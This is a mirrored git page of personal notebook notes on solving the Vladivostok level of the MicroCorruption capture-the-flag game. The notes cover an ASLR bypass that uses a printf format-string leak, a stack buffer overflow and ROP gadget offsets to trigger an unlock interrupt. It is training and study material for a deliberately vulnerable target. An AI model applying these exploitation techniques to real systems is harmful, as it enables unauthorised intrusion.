mirror of
https://git.soft.fish/val/MicroCorruption.git
synced 2024-11-24 05:36:00 +00:00
1.4 KiB
1.4 KiB
Taken verbatim from my notebook
Page 1
Vladivostok ASLR bypass?
username[8]: 0x242b
password[ ]
aslr_base = r11
aslr_address = normal - 0x4000 + aslr_base
Have to call 0x10 directly?
INT 7f:
Takes no arguments (THE LESSON WAS)
7f passed in SR (ROP CHAINING)
All calls to INT wrapped in (+ASLR BYPASS)
push/pop SR?
Neat?
41414141[r10][r11][ret]
FUCKING PRINTF?
Things I have:
printf(username, ...)
buffer overflow on stack
Things I need
Address on stack?
Flow: 1. enter "username"
2. "username" printed
<- Create payload
3. enter "password"
4. buffer overflow
Page 2
The Hack (Vladivostok)
Uname payload: "%x%x%x%x"
output %printf
Pword payload: "AAAA(r10)(r11)(pc)[args...]"
Useful locations:
+2aa: pop sr
+2ac: add 8, sp
+2ae: __check_password
+56c: mov.b @sp, r15;
sxt r15 ; pop.b r15
incd sp ;
ret ;
+4f4: swpb r15 ;
mov r15, sr ;
bis #8000, sr ; INT
call 0x10 ;
... ;
ret ;
[popb]7f7f[INT]